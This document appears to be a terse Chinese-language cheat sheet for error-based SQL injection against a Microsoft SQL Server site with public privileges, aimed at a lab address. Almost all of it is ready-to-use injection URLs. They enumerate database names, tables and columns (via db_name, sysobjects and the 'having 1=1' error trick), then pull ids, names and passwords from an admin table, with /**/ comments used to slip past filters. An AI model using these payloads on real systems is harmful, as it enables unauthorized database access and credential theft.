mssql public权限sql注入

第一 查看数据库库名
http://192.168.152.129:85/1.aspx?xxser=1 and 1=(select db_name())
http://192.168.152.129:85/1.aspx?xxser=1 and 1=(select db_name(1))
http://192.168.152.129:85/1.aspx?xxser=1 and 1=(select db_name(2))
http://192.168.152.129:85/1.aspx?xxser=1 and 1=(select db_name(3)
http://192.168.152.129:85/1.aspx?xxser=1 and 1=(select db_name(4)

第二步 TestDB表名 
http://192.168.152.129:85/1.aspx?xxser=1 and (select top 1 name from
(select top 1 name from TestDB..sysobjects where xtype=0X75 order by name) t order
by name desc)=0

第四步 列名
http://192.168.152.129:85/1.aspx?xxser=1 having 1=1
http://192.168.152.129:85/1.aspx?xxser=1 group by admin.id  having 1=1
http://192.168.152.129:85/1.aspx?xxser=1 group by admin.id,admin.name having 1=1

第五步 字段


/**/and/**/(select/**/top/**/1/**/isnull(cast([字段名 1]
/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([字段名 2]
/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([字段名 3]
/**/as/**/nvarchar(4000)),char(32))/**/from/**/[数据库名]
..[表名]
/**/where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/
from/**/[数据库名]..
[表名]/**/where/**/1=1/**/group/**/by/**/id))>0/**/and/**/1=1



http://192.168.152.129:85/1.aspx?xxser=1/**/and/**/(select/**/top/**/1/**/i
snull(cast([id]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([na
me]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]/**/a
s/**/nvarchar(4000)),char(32))/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/
and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/from/**/[testdb]..[admin]/
**/where/**/1=1/**/group/**/by/**/id))>0/**/and/**/1=1